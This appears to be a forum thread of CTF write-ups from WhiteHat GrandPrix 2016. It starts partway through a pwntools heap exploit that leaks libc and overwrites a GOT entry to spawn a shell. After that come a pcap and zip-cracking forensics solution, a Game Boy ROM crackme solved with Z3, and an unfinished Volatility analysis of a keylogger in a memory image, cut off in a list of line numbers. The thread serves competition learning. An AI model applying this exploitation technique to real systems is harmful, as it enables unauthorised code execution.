                          s[i] = ~(tmp2 | ~tmp) | (s[i] & (s[i] ^ 0x80) & 0x7D | tmp2 & 0x82) ^ (tmp & 0x7D | ~tmp & 0x82)
                        res = ''
                        for i in xrange(len(s)):
                          res += chr(s[i])
                        return res
                      
                      def encode(ci):
                        '''
                        tmp = ~(~s[i] | 0xFFFFFF7F);
                        s[i] = (*(&table[tmp] + (i & (i ^ 0xFFFFFF80))) & 0xF7 | ~*(&table[tmp] + (i & (i ^ 0xFFFFFF80))) & 8) ^ (s[i] & 0xF7 | ~s[i] & 8);
                        tmp2 = ~(s[i] & (s[i] ^ 0xFFFFFF80));
                        s[i] = ~(tmp2 | ~(_BYTE)tmp) | (s[i] & (s[i] ^ 0x80) & 5 | tmp2 & 0xFA) ^ (tmp & 5 | ~(_BYTE)tmp & 0xFA);
                        '''
                        s = []
                        for b in ci:
                          s.append(ord(b))
                        for i in xrange(len(s)):
                          tmp = ~(~s[i] | 0xFFFFFF7F)
                          s[i] = ord(table[tmp+(i&(i^0xffffff80))]) ^ s[i]
                          tmp2 = ~(s[i] & (s[i] ^ 0xFFFFFF80));
                          s[i] = ~(tmp2 | ~tmp) | (s[i] & (s[i] ^ 0x80) & 5 | tmp2 & 0xFA) ^ (tmp & 5 | ~tmp & 0xFA);
                        res = ''
                        for x in s:
                          res += "%02X" % x
                        return res
                      
                      def send(ci):
                        r.sendline(encode(ci))
                      
                      def pt():
                        for s in r.recvuntil('56077B742A04\n').split():
                          decode(s)
                      
                      def add(name, note, sz, body):
                        pt()
                        log.info('adding')
                        send('add\n')
                        getline()
                        send(str(sz))
                        getline()
                        send(name)
                        getline()
                        send(note)
                        getline()
                        send(body)
                      
                      def edit(idx, name, note, body):
                        pt()
                        log.info('editing')
                        send('edit\n')
                        getline()
                        send(str(idx))
                        getline()
                        send(name)
                        getline()
                        send(note)
                        getline()
                        send(body)
                      
                      def getline():  
                        return decode(r.recvline())
                      
                      def free(idx):
                        pt()
                        send('free\n')
                        log.info('freeing %d' % idx)
                        print getline()
                        send(str(idx))
                      
                      def read(idx):
                        pt()
                        send('read\n')
                        getline()
                        send(str(idx))
                        getline() # note #
                        getline() # date
                        res = getline()[len('\t[*] Name :'):]
                        getline() # body
                        return res[:-1]
                      
                      add('AAAA\n','BBBB\n',36, 'C'*32+'\n')
                      add('AAAA\n','BBBB\n',36, 'D'*32+'\n')
                      add('AAAA\n','BBBB\n', 310, p32(0x31)*75+'\n')
                      add('AAAA\n','BBBB\n',36, 'O'*32+'\n')
                      add('AAAA\n','BBBB\n',36, 'O'*32+'\n')
                      
                      free(0)
                      edit(1, "AAAA\n", "BBBB\n", 'E'*32+p32(0xb0))
                      free(2)
                      
                      add('AAAA\n', 'BBBB\n', 32, '\n')
                      free(3)
                      name = read(1)
                      libc_base = u32(name[:4])-0x1ab450
                      heap_base = u32(name[4:8])-0x1228
                      log.info("libc @ 0x%x" % libc_base)
                      log.info("heap @ 0x%x" % heap_base)
                      
                      free(0)
                      
                      add('AAAA\n', 'BBBB\n', 160-4-48, '\x81'*37+'\n')
                      
                      add('AAAA\n', 'BBBB\n', 48, 'Z'*36+'\n')
                      
                      edit(1, p32(0)+p32(0x41)+p32(heap_base+0x18)+p32(heap_base+0x1c)+'\n', 'B\n','GGGG'*4 + p32(0x40) + p32(0x68)+ '\n')
                      free(2)
                      elf=ELF('note')
                      edit(1, p32(elf.got['atoi'])+p32(1)+"\x24"+'\n', '\n', '\n')
                      libc = ELF('./bc.so.6')
                      libc.address = libc_base
                      edit(0, p32(libc.symbols['system']) + p32(libc.symbols['__fpurge'])+'\n', '\n', '\n')
                      
                      send('add\n')
                      getline()
                      send('sh\n')
                      
                      r.interactive()
                      Flag:

                      Mã:
                      WhiteHat{24b3e07a4494d4cd3ad973ee7d5fadca390df5bb}

                      Comment


                      • #12
                        Banh Giay

                        Category Forensics | Teams having solved this 14 | Point 100 | Author: WhiteHat Wargame | Writeup: rawsec

                        Description:


                        Solution:
                        • Download the zip.
                        • Extract it.
                        • Open the pcapng with Wireshark.
                        • Filter http requests.
                        • See frame n°134 GET /corporation/secret HTTP/1.1.
                        • Extract the file (File > Export Objects > HTTP).
                        • Check the type of file:
                        Mã:
                        [noraj@rawsec]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
                        $ file secret
                        secret: Zip archive data, at least v2.0 to extract
                        • Unzip it:
                        Mã:
                        [noraj@rawsec]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
                        $ unzip secret
                        Archive:  secret
                        [secret] EasyExtrack password:
                        • Ok, there is a pasword, let’s check the html page: frame n°149 GET /corporation/arsenal.html HTTP/1.1.
                        • Extract it from the pcapng.
                        • See the hint: For H.i.n.t: Referring to arsenal, i remember a number. It also length of secret p.a.s.s.w.o.r.d.
                        • One key event is:
                        • With luck and guessing I found this number was 4.
                        • So now let’s try to crack the zip password with fcrackzip:
                        Mã:
                        [noraj@rawsec]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
                        $ fcrackzip -b -c a -l 4 -u secret
                        PASSWORD FOUND!!!!: pw == fuzu
                        • Extract the zip with the password.
                        • Check what file type EasyExtrack is:
                        Mã:
                        [noraj@rawsec]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
                        $ file EasyExtrack
                        EasyExtrack: Zip archive data, at least v1.0 to extract
                        • Try to unzip it with the same password:
                        Mã:
                        [noraj@rawsec]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
                        $ unzip EasyExtrack -d out
                        Archive:  EasyExtrack
                           creating: out/EasyExtrack/
                        [EasyExtrack] EasyExtrack/flag1.txt password:
                          inflating: out/EasyExtrack/flag1.txt  
                          inflating: out/EasyExtrack/flag10.txt  
                          inflating: out/EasyExtrack/flag11.txt  
                          inflating: out/EasyExtrack/flag12.txt  
                          inflating: out/EasyExtrack/flag13.txt  
                          inflating: out/EasyExtrack/flag14.txt  
                          inflating: out/EasyExtrack/flag15.txt  
                          inflating: out/EasyExtrack/flag16.txt  
                          inflating: out/EasyExtrack/flag17.txt  
                          inflating: out/EasyExtrack/flag18.txt  
                          inflating: out/EasyExtrack/flag19.txt  
                          inflating: out/EasyExtrack/flag2.txt  
                          inflating: out/EasyExtrack/flag20.txt  
                          inflating: out/EasyExtrack/flag21.txt  
                          inflating: out/EasyExtrack/flag22.txt  
                          inflating: out/EasyExtrack/flag23.txt  
                          inflating: out/EasyExtrack/flag24.txt  
                          inflating: out/EasyExtrack/flag25.txt  
                          inflating: out/EasyExtrack/flag26.txt  
                          inflating: out/EasyExtrack/flag27.txt  
                          inflating: out/EasyExtrack/flag28.txt  
                          inflating: out/EasyExtrack/flag29.txt  
                          inflating: out/EasyExtrack/flag3.txt  
                          inflating: out/EasyExtrack/flag30.txt  
                          inflating: out/EasyExtrack/flag4.txt  
                          inflating: out/EasyExtrack/flag5.txt  
                          inflating: out/EasyExtrack/flag6.txt  
                          inflating: out/EasyExtrack/flag7.txt  
                          inflating: out/EasyExtrack/flag8.txt  
                          inflating: out/EasyExtrack/flag9.txt
                        • Here are all the flags:
                        Mã:
                        raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
                        raw: Flag{12f54a96f6444324693t0da001cafda8b}
                        raw: Flag{60b725f10c9c85c70d9h7880dfe8191b3}
                        raw: Flag{f5302386464f953ed58u1edac03556e55}
                        raw: Flag{d9bed3b7e151f11b8fdyadf75f1db96d9}
                        raw: Flag{3b5d5c3712955042212n316173ccf37be}
                        raw: Flag{72cfd272ace172fa3502h6445fbef9b03}
                        raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
                        raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
                        raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
                        raw: Flag{9a8ad92c50cae39aa2c5604pfd0ab6d8c}
                        raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
                        raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
                        raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
                        raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
                        raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
                        raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
                        raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
                        raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
                        raw: Flag{12f54a96f64443s246930da001cafda8b}
                        raw: Flag{92520a5a9cf8932i20b9cd447f585f144}
                        raw: Flag{01fbdc44ef819db6p273bc30965a23814}
                        raw: Flag{9ffbf43126e33be52hcd2bf7e01d627f9}
                        raw: Flag{12f54a96f644432469o30da001cafda8b}
                        raw: Flag{9d7bf075372908f55e2nd945c39e0a613}
                        raw: Flag{92520a5a9cf893220b9cud447f585f144}
                        raw: Flag{009520053b00386d1173fu3988c55d192}
                        raw: Flag{e73af36376314c7c0022cbk1d204f76b3}
                        raw: Flag{e85dde330c34efb0e526ee3j082e4353b}
                        raw: Flag{7d9d25f71cb8a5aba8620254l0a20d405}
                        • Flags are not hashes because they are 33 char long. But we can see there is one non-hex char in each flag.
                        • Remove each non-hex flag to get 32 char long MD5 hashed:
                        Mã:
                        d2a33790e5bf28b33cdbf61722a06989
                        12f54a96f64443246930da001cafda8b
                        60b725f10c9c85c70d97880dfe8191b3
                        f5302386464f953ed581edac03556e55
                        d9bed3b7e151f11b8fdadf75f1db96d9
                        3b5d5c3712955042212316173ccf37be
                        72cfd272ace172fa35026445fbef9b03
                        d2a33790e5bf28b33cdbf61722a06989
                        d2a33790e5bf28b33cdbf61722a06989
                        d2a33790e5bf28b33cdbf61722a06989
                        9a8ad92c50cae39aa2c5604fd0ab6d8c
                        d2a33790e5bf28b33cdbf61722a06989
                        d2a33790e5bf28b33cdbf61722a06989
                        d2a33790e5bf28b33cdbf61722a06989
                        d2a33790e5bf28b33cdbf61722a06989
                        d2a33790e5bf28b33cdbf61722a06989
                        d2a33790e5bf28b33cdbf61722a06989
                        d2a33790e5bf28b33cdbf61722a06989
                        d2a33790e5bf28b33cdbf61722a06989
                        12f54a96f64443246930da001cafda8b
                        92520a5a9cf893220b9cd447f585f144
                        01fbdc44ef819db6273bc30965a23814
                        9ffbf43126e33be52cd2bf7e01d627f9
                        12f54a96f64443246930da001cafda8b
                        9d7bf075372908f55e2d945c39e0a613
                        92520a5a9cf893220b9cd447f585f144
                        009520053b00386d1173f3988c55d192
                        e73af36376314c7c0022cb1d204f76b3
                        e85dde330c34efb0e526ee3082e4353b
                        7d9d25f71cb8a5aba86202540a20d405
                        • The extracted wrong letters are (in order): xthuynhxxxpxxxxxxxxsiphonuukjl.
                        • Use hashkiller.co.uk to decrypt MD5 hashes:
                        Mã:
                          
                            d2a33790e5bf28b33cdbf61722a06989 MD5 : F
                        12f54a96f64443246930da001cafda8b MD5 : l
                        60b725f10c9c85c70d97880dfe8191b3 MD5 : a
                        f5302386464f953ed581edac03556e55 MD5 : g
                        d9bed3b7e151f11b8fdadf75f1db96d9 MD5 : {
                        3b5d5c3712955042212316173ccf37be MD5 : b
                        72cfd272ace172fa35026445fbef9b03 MD5 : r
                        d2a33790e5bf28b33cdbf61722a06989 MD5 : F
                        d2a33790e5bf28b33cdbf61722a06989 MD5 : F
                        d2a33790e5bf28b33cdbf61722a06989 MD5 : F
                        9a8ad92c50cae39aa2c5604fd0ab6d8c MD5 : f
                        d2a33790e5bf28b33cdbf61722a06989 MD5 : F
                        d2a33790e5bf28b33cdbf61722a06989 MD5 : F
                        d2a33790e5bf28b33cdbf61722a06989 MD5 : F
                        d2a33790e5bf28b33cdbf61722a06989 MD5 : F
                        d2a33790e5bf28b33cdbf61722a06989 MD5 : F
                        d2a33790e5bf28b33cdbf61722a06989 MD5 : F
                        d2a33790e5bf28b33cdbf61722a06989 MD5 : F
                        d2a33790e5bf28b33cdbf61722a06989 MD5 : F
                        12f54a96f64443246930da001cafda8b MD5 : l
                        92520a5a9cf893220b9cd447f585f144 MD5 : _
                        01fbdc44ef819db6273bc30965a23814 MD5 : h
                        9ffbf43126e33be52cd2bf7e01d627f9 MD5 : e
                        12f54a96f64443246930da001cafda8b MD5 : l
                        9d7bf075372908f55e2d945c39e0a613 MD5 : p
                        92520a5a9cf893220b9cd447f585f144 MD5 : _
                        009520053b00386d1173f3988c55d192 MD5 : y
                        e73af36376314c7c0022cb1d204f76b3 MD5 : o
                        e85dde330c34efb0e526ee3082e4353b MD5 : u
                        7d9d25f71cb8a5aba86202540a20d405 MD5 : }
                        • Unformated flag is: Flag{brFFFfFFFFFFFFl_help_you}.
                        • SHA1 the unformated flag:
                        Mã:
                        [noraj@rawsec]–––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/out/EasyExtrack]
                        $ printf %s 'Flag{brFFFfFFFFFFFFl_help_you}' | sha1sum
                        e7643ccd180c84176ae0b4361c3b169fceacf961  -
                        • Format the flag: WhiteHat{e7643ccd180c84176ae0b4361c3b169fceacf961} .
                        • Not the good flag …
                        Note that 800618943025315f869e4e1f09471012 is the right md5 hash for F andd2a33790e5bf28b33cdbf61722a06989 is the wrong md5 hash for F that you can obtain with non POSIX tools like echo (that’s why I use printf). So only hashkiller knows both wrong and right hash, all other md5 decrypt online tools knows only the right one so they are not able to decrypt d2a33790e5bf28b33cdbf61722a06989. But anyway…
                        • You know what? After some wasted hours I figured that I needed to replace F with some guessed letters:Flag{bruteforce_will_help_you}. Yes guessing again.
                        • SHA1 the unformated flag:
                        Mã:
                        [noraj@rawsec]–––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/out/EasyExtrack]
                        $ printf %s 'Flag{bruteforce_will_help_you}' | sha1sum
                        1e71b26aa01733cd13e5199386c70fe31df43deb  -
                        • Format the flag: WhiteHat{1e71b26aa01733cd13e5199386c70fe31df43deb} .
                        • Not the good flag …
                        • Description said Submit: WhiteHat{SHA1(flag)}, it depends if flag means Flag{xxx} or xxx.
                        • SHA1 the unformated flag:
                        Mã:
                        [noraj@rawsec]–––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/out/EasyExtrack]
                        $ printf %s 'bruteforce_will_help_you' | sha1sum                                                                    
                        31bd8aa56447ea1c703d0943e175a06a5c4ee614  -
                        • Format the flag: WhiteHat{31bd8aa56447ea1c703d0943e175a06a5c4ee614} .
                        • This time this is the good one.
                        Here was my ruby script:

                        Mã:
                        #!/usr/bin/ruby
                        (1..30).each do |num|
                            raw_flag = File.read('flag'+num.to_s+'.txt')
                            # Not sanitized flags
                            puts 'raw: '.concat(raw_flag)
                            only_flag = raw_flag.match(/\{([a-z0-9]{33})\}/).captures[0]
                            # Sanitized flags
                            puts only_flag.gsub(/[^0-9a-fA-F]/, '')
                        end


                        Comment


                        • #13
                          Some web writeup of CLGTftMeePwn: http://81glntd.blogspot.com/2016/12/...2-part-of.html
                          Last edited by nQg; 06/01/17, 01:38 PM.

                          Comment


                          • #14
                            Writeup bài Cơm hến by LS



                            Summary: Reverse engineering of a Game Boy ROM and computation of the key with Z3.

                            Tools:This is a write-up for the “Com hen” challenge from WhiteHat GrandPrix 2016 CTF.

                            The provided binary is a Game Boy ROM prompting for a key:




                            Inputting a wrong key results in this:




                            I started by looking at the strings:




                            This sure looks interesting but there is no xrefs for these strings. However, searching for immediate values leads us to an interesting function with two basic blocks at the end:



                            Since each of these basic blocks are referencing respectively success and fail strings, we can safely assume that sub_1DDD is used to print strings.

                            After some renaming and immediate to offset conversions we end up with the following:



                            Let’s see the code path we need to follow to end in the success basic block:



                            The first check is in the first basic block. In order to get some context, I am putting a breakpoint at 0x5A6 in BGB and provide the following input:
                            ABCDEFGHIJKLMNOPQRSTUVWXYZ



                            When the breakpoint triggers, we can see that the code is actually comparing the byte at 0xC0B7 to 0x45, ie, the 24th char of our input must be an ‘E’.

                            Also, we can see that our input is stored at 0xC0A0 and that there is the following 32 bytes string at 0xC0D2:
                            3YU8UV86XYZY4W4659756ZUY69582043
                            Back to our function, the second check depends on the “de” register which is set by sub_86A:



                            Which is nothing more than a string compare function, loading two strings from the stack and outputting the result in the “de” register.

                            Now let’s get some context with a breakpoint at 0x86A and the following input (‘E’ at the 24th position in order to pass the first check):
                            ABCDEFGHIJKLMNOPQRSTUVWEYZ



                            The two compared strings are at 0xC0A0 and 0xC0D2, ie, our input and the mysterious 32 bytes string.

                            Moreover, our input changed, it is now:

                            VWXYZABCDEFGHIJKLMNOPQRZTU

                            Looks like a dumb ROT(21). However, trying to input ROT(-21, “3YU8UV86XYZY4W4659756ZUY69582043”) as key does not work.

                            I then started to look at sub_4E0 since it is the only function that is called between the first check and the strcmp.

                            The function is rather long, but after some RE, the algorithm is actually quite simple. Here is the equivalent C code:

                            Mã:
                            // Check if c is a number short sub_436(unsigned char c) { return c <= '9' && c >= '0'; } // Get distance between c1 and c2 short sub_40D(unsigned char c1, unsigned char c2) { int ret = c1 - c2; return ret >= 0 ? ret : -ret; } // Do one hash round void sub_457(unsigned char* key, unsigned char last, short distance) { for (unsigned char* i = key; *i != 0; ++i) { if (sub_436(*i)) continue; *i += distance; if (*i > 0x5A) *i += 0xE6; } } // Hash the key void sub_4E0(unsigned char* key) { unsigned char last = 0x41; for (unsigned char* i = key; *i != 0; ++i) { if (sub_436(*i)) continue; short distance = sub_40D(last, *i); sub_457(key, last, distance); last = *i; } }
                            Thus, the crackme is equivalent to the following C program:

                            Mã:
                            #include <stdio.h> #include <string.h> short is_number(unsigned char c) { return c <= '9' && c >= '0'; } short get_distance(unsigned char c1, unsigned char c2) { int ret = c1 - c2; return ret >= 0 ? ret : -ret; } void hash_round(unsigned char* key, unsigned char last, short distance) { for (unsigned char* i = key; *i != 0; ++i) { if (is_number(*i)) continue; *i += distance; if (*i > 0x5A) *i += 0xE6; } } void hash_key(unsigned char* key) { unsigned char last = 0x41; for (unsigned char* i = key; *i != 0; ++i) { if (is_number(*i)) continue; short distance = get_distance(last, *i); hash_round(key, last, distance); last = *i; } } int main(void) { unsigned char key[50]; gets(key); hash_key(key); if (!strcmp("3YU8UV86XYZY4W4659756ZUY69582043", key)) puts("Success"); else puts("Fail"); }
                            Let’s fire up Z3:

                            Mã:
                            #! /usr/bin/env python2 from z3 import * def abs(x): return If(x >= 0, x, -x) def adjust(x): return If(x <= 0x5A, x, (x + 0xE6) & 0xFF) def distance(x, y): return abs(x - y) s = Solver() ref = "3YU8UV86XYZY4W4659756ZUY69582043" ref = [ord(x) for x in ref] symvars = [BitVec(str(i), 32) for i in range(32)] key = list(symvars) # We only want printable ASCII for i in range(32): s.add(key[i] <= 0x7e) s.add(key[i] >= 0x20) # First condition s.add(key[23] == ord("E")) # Numbers are left unmodified nan_idx = [i for i, j in enumerate(ref) if not "0" <= j <= "9"] # Hash last = 0x41 for i in nan_idx: d = distance(last, key[i]) for j in nan_idx: key[j] = adjust(key[j] + d) last = key[i] for i in range(32): s.add(key[i] == ref[i]) if s.check() == sat: m = s.model() print("".join([chr(m[x].as_long()) for x in symvars])) else: print("unsat")
                            And after a couple of minutes we get the following:

                            Mã:
                            3y[8'(86*_zy4]4659756zuE69582043
                            Which is accepted by the ROM


                            Last edited by sunny; 07/01/17, 09:17 AM.
                            Whitehat.vn

                            Comment


                            • #15
                              Writeup bài Banh it la gai by rawsec

                              Description


                              Submit: WhiteHat{SHA1(flag)}

                              http://material.grandprix.whitehatvn...b74659c2cc.zip

                              http://bakmaterial.grandprix.whiteha...b74659c2cc.zip

                              Alternative server on amazon in case of low traffic:

                              http://54.183.97.137/gp2016/For02_36...b74659c2cc.zip
                              Solution

                              TL;DR: incomplete write-up.
                              • Download the zip.
                              • Extract it.
                              • We have a raw image.
                              • Let’s see what we can do with Volatility:
                              1
                              2
                              3
                              4
                              5
                              6
                              7
                              8
                              9
                              10
                              11
                              12
                              13
                              14
                              15
                              16
                              17
                              18
                              19
                              20
                              21
                              22
                              23
                              24
                              25
                              26
                              27
                              28
                              29
                              30
                              31
                              32
                              33
                              34
                              35
                              36
                              37
                              38
                              39
                              40
                              41
                              42
                              43
                              44
                              45
                              46
                              47
                              48
                              [noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
                              $ volatility -f bkav5.raw imageinfo
                              Volatility Foundation Volatility Framework 2.5
                              INFO : volatility.debug : Determining profile based on KDBG search...
                              Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
                              AS Layer1 : IA32PagedMemoryPae (Kernel AS)
                              AS Layer2 : FileAddressSpace (/home/noraj/CTF/WhiteHat_GrandPrix/2016/For2/bkav5.raw)
                              PAE type : PAE
                              DTB : 0x334000L
                              KDBG : 0x8054d2e0L
                              Number of Processors : 2
                              Image Type (Service Pack) : 3
                              KPCR for CPU 0 : 0xffdff000L
                              KPCR for CPU 1 : 0xfd24c000L
                              KUSER_SHARED_DATA : 0xffdf0000L
                              Image date and time : 2016-11-06 16:47:44 UTC+0000
                              Image local date and time : 2016-11-06 23:47:44 +0700
                              [noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
                              $ volatility -f bkav5.raw --profile=WinXPSP2x86 pstree
                              Volatility Foundation Volatility Framework 2.5
                              Name Pid PPid Thds Hnds Time
                              -------------------------------------------------- ------ ------ ------ ------ ----
                              0x8107e020:System 4 0 60 228 1970-01-01 00:00:00 UTC+0000
                              . 0xff596808:smss.exe 544 4 3 17 2016-11-06 16:44:22 UTC+0000
                              .. 0xff4b4da0:winlogon.exe 644 544 25 524 2016-11-06 16:44:23 UTC+0000
                              ... 0xff609998:services.exe 744 644 13 246 2016-11-06 16:44:25 UTC+0000
                              .... 0xff4a3d70:vmacthlp.exe 928 744 1 25 2016-11-06 16:44:26 UTC+0000
                              .... 0xff67a7e8:spoolsv.exe 1600 744 6 54 2016-11-06 16:47:21 UTC+0000
                              .... 0xff5cfda0:svchost.exe 992 744 10 178 2016-11-06 16:44:27 UTC+0000
                              .... 0xff583888:svchost.exe 1348 744 6 119 2016-11-06 16:44:27 UTC+0000
                              .... 0xff59a7b8:svchost.exe 944 744 7 122 2016-11-06 16:44:26 UTC+0000
                              .... 0x80fdec10:svchost.exe 180 744 5 88 2016-11-06 16:44:45 UTC+0000
                              .... 0xff481020:svchost.exe 1876 744 15 194 2016-11-06 16:47:07 UTC+0000
                              .... 0xff58c7b8:svchost.exe 1244 744 5 59 2016-11-06 16:44:27 UTC+0000
                              ... 0xff5be460:lsass.exe 760 644 25 332 2016-11-06 16:44:25 UTC+0000
                              .. 0xff5974d8:csrss.exe 616 544 10 265 2016-11-06 16:44:22 UTC+0000
                              0x80ecf928:explorer.exe 1740 1704 17 424 2016-11-06 16:44:32 UTC+0000
                              . 0xff5bf138umpIt.exe 308 1740 1 27 2016-11-06 16:47:42 UTC+0000
                              . 0x80eb7690:rundll32.exe 1884 1740 4 72 2016-11-06 16:44:37 UTC+0000
                              . 0xff5b2888:keylog.exe 2020 1740 2 35 2016-11-06 16:47:17 UTC+0000
                              [noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
                              $ volatility -f bkav5.raw --profile=WinXPSP2x86 procdump -p 2020 --dump-dir=.
                              Volatility Foundation Volatility Framework 2.5
                              Process(V) ImageBase Name Result
                              ---------- ---------- -------------------- ------
                              0xff5b2888 0x00400000 keylog.exe OK: executable.2020.exe
                              • See a supicious keylog.exe so we dumped it.
                              • Upload it to Virustotal and to Hybrid Analysis.
                              • Detection ratio: 4 / 56, a keylogger.
                              • Just look for quick win:
                              1
                              2
                              3
                              4
                              5
                              6
                              7
                              8
                              9
                              [noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
                              $ strings keylog.exe_executable.2020.exe
                              [...]
                              %c - %d
                              c:/windows/keylog.log
                              [WIN]
                              [...]
                              • The malware is saving its collected informations in c:/windows/keylog.log.
                              • Let’s find the file and dump it:
                              1
                              2
                              3
                              4
                              5
                              6
                              7
                              8
                              9
                              10
                              11
                              12
                              [noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
                              $ volatility -f bkav5.raw --profile=WinXPSP2x86 filescan | grep -i 'keylog.log'
                              Volatility Foundation Volatility Framework 2.5
                              Offset(P) #Ptr #Hnd Access Name
                              ------------------ ------ ------ ------ ----
                              0x00000000010410a0 1 0 RW-rw- \Device\HarddiskVolume1\WINDOWS\keylog.log
                              [noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
                              $ volatility -f bkav5.raw --profile=WinXPSP2x86 dumpfiles -Q 0x00000000010410a0 --dump-dir=.
                              Volatility Foundation Volatility Framework 2.5
                              DataSectionObject 0x010410a0 None \Device\HarddiskVolume1\WINDOWS\keylog.log
                              • But this is a non standard encoding:
                              1
                              2
                              3
                              4
                              5
                              6
                              7
                              8
                              9
                              10
                              11
                              12
                              13
                              14
                              15
                              16
                              17
                              18
                              19
                              20
                              21
                              22
                              23
                              24
                              25
                              26
                              27
                              28
                              29
                              30
                              31
                              32
                              33
                              34
                              35
                              36
                              37
                              38
                              [noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
                              $ file keylog.log_file.None.0x80eb7008.dat
                              keylog.log_file.None.0x80eb7008.dat: Non-ISO extended-ASCII text, with NEL line terminators
                              [noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
                              $ xxd keylog.log_file.None.0x80eb7008.dat
                              00000000: 8589 9790 83bd b3ba 859b b0aa bbac 83b6 ................
                              00000010: bbb2 b2b1 859b b0aa bbac 83a9 bbb2 b2b1 ................
                              00000020: 859c 9f9d 958d 8e9f 9d9b 83bd b1b3 bbfe ................
                              00000030: a7b1 abfe b9ab a7ff 859c 9f9d 958d 8e9f ................
                              00000040: 9d9b 83fe e185 9bb0 aabb ac83 a9bb b2fe ................
                              00000050: b1ac fea9 bbb2 b2fe e185 9bb0 aabb ac83 ................
                              00000060: a9b6 bfaa bbac a8bb acfe 869a 859b b0aa ................
                              00000070: bbac 8385 8997 9083 bdb6 acb1 b3bb 859b ................
                              00000080: b0aa bbac 83a9 bbb2 feb1 ac85 9c9f 9d95 ................
                              00000090: 8d8e 9f9d 9b83 859c 9f9d 958d 8e9f 9d9b ................
                              000000a0: 8385 9c9f 9d95 8d8e 9f9d 9b83 b2bd b1b3 ................
                              000000b0: bbfe b1ac fea9 bbb2 bdb1 b3bb 859b b0aa ................
                              000000c0: bbac 83ab b6b3 fef0 f0f0 fe85 9c9f 9d95 ................
                              000000d0: 8d8e 9f9d 9b83 859c 9f9d 958d 8e9f 9d9b ................
                              000000e0: 8385 9c9f 9d95 8d8e 9f9d 9b83 859c 9f9d ................
                              000000f0: 958d 8e9f 9d9b 8385 9c9f 9d95 8d8e 9f9d ................
                              00000100: 9b83 859c 9f9d 958d 8e9f 9d9b 8385 9c9f ................
                              00000110: 9d95 8d8e 9f9d 9b83 859c 9f9d 958d 8e9f ................
                              00000120: 9d9b 8385 9c9f 9d95 8d8e 9f9d 9b83 859c ................
                              00000130: 9f9d 958d 8e9f 9d9b 8385 9c9f 9d95 8d8e ................
                              00000140: 9f9d 9b83 859c 9f9d 958d 8e9f 9d9b 8385 ................
                              00000150: 9c9f 9d95 8d8e 9f9d 9b83 b7fe b9b1 aafe ................
                              00000160: b7aa fef0 feaa b6bf aafe a9bb b2bd b1b3 ................
                              00000170: bbfe e49a 859d aaac b283 aab8 bf85 9bb0 ................
                              00000180: aabb ac83 859d aaac b283 aab8 bdbb b1b1 ................
                              00000190: b5f0 bdb1 b385 9bb0 aabb ac83 aab6 b7ad ................
                              000001a0: b7ad b3a7 b8b2 bfb9 d7a5 a385 92bb b8aa ................
                              000001b0: 9fac acb1 a983 b5ba b7bb b5b5 bab7 eced ................
                              000001c0: e7ed e9ba b8b6 ede7 b4ad b2ad bab5 e7ed ................
                              000001d0: 859b b0aa bbac 83aa b6bf b0b5 a7b1 abff ................
                              000001e0: 859b b0aa bbac 83e4 9abf bcbd babb b8b9 ................
                              000001f0: b6b7 b5b2 b3b0 b1ae afac adaa e1e1 e1a7 ................
                              • This is nor UTF-8, nor WINDOWS-1252/C1252.
                              • Try to determine what kind of encoding this is (source: superuser.com):
                              1
                              2
                              3
                              4
                              5
                              6
                              $ iconv --list | sed 's/\/\/$//' | sort > encodings.list
                              $ for a in `cat encodings.list`; do
                              printf "$a "
                              iconv -f $a -t UTF-8 keylog.log_file.None.0x80eb7008.dat > /dev/null 2>&1 \
                              && echo "ok: $a" || echo "fail: $a"
                              done | tee result.txt
                              • Let’s take a look at results:
                              1
                              2
                              3
                              4
                              5
                              6
                              7
                              8
                              9
                              10
                              11
                              12
                              13
                              14
                              15
                              16
                              17
                              18
                              19
                              20
                              21
                              22
                              23
                              24
                              25
                              26
                              27
                              28
                              29
                              30
                              31
                              32
                              33
                              34
                              35
                              36
                              37
                              38
                              39
                              40
                              41
                              42
                              43
                              44
                              45
                              46
                              47
                              48
                              49
                              50
                              51
                              52
                              53
                              54
                              55
                              56
                              57
                              58
                              59
                              60
                              61
                              62
                              63
                              64
                              65
                              66
                              67
                              68
                              69
                              70
                              71
                              72
                              73
                              74
                              75
                              76
                              77
                              78
                              79
                              80
                              81
                              82
                              83
                              84
                              85
                              86
                              87
                              88
                              89
                              90
                              91
                              92
                              93
                              94
                              95
                              96
                              97
                              98
                              99
                              100
                              101
                              102
                              103
                              104
                              105
                              106
                              107
                              108
                              109
                              110
                              111
                              112
                              113
                              114
                              115
                              116
                              117
                              118
                              119
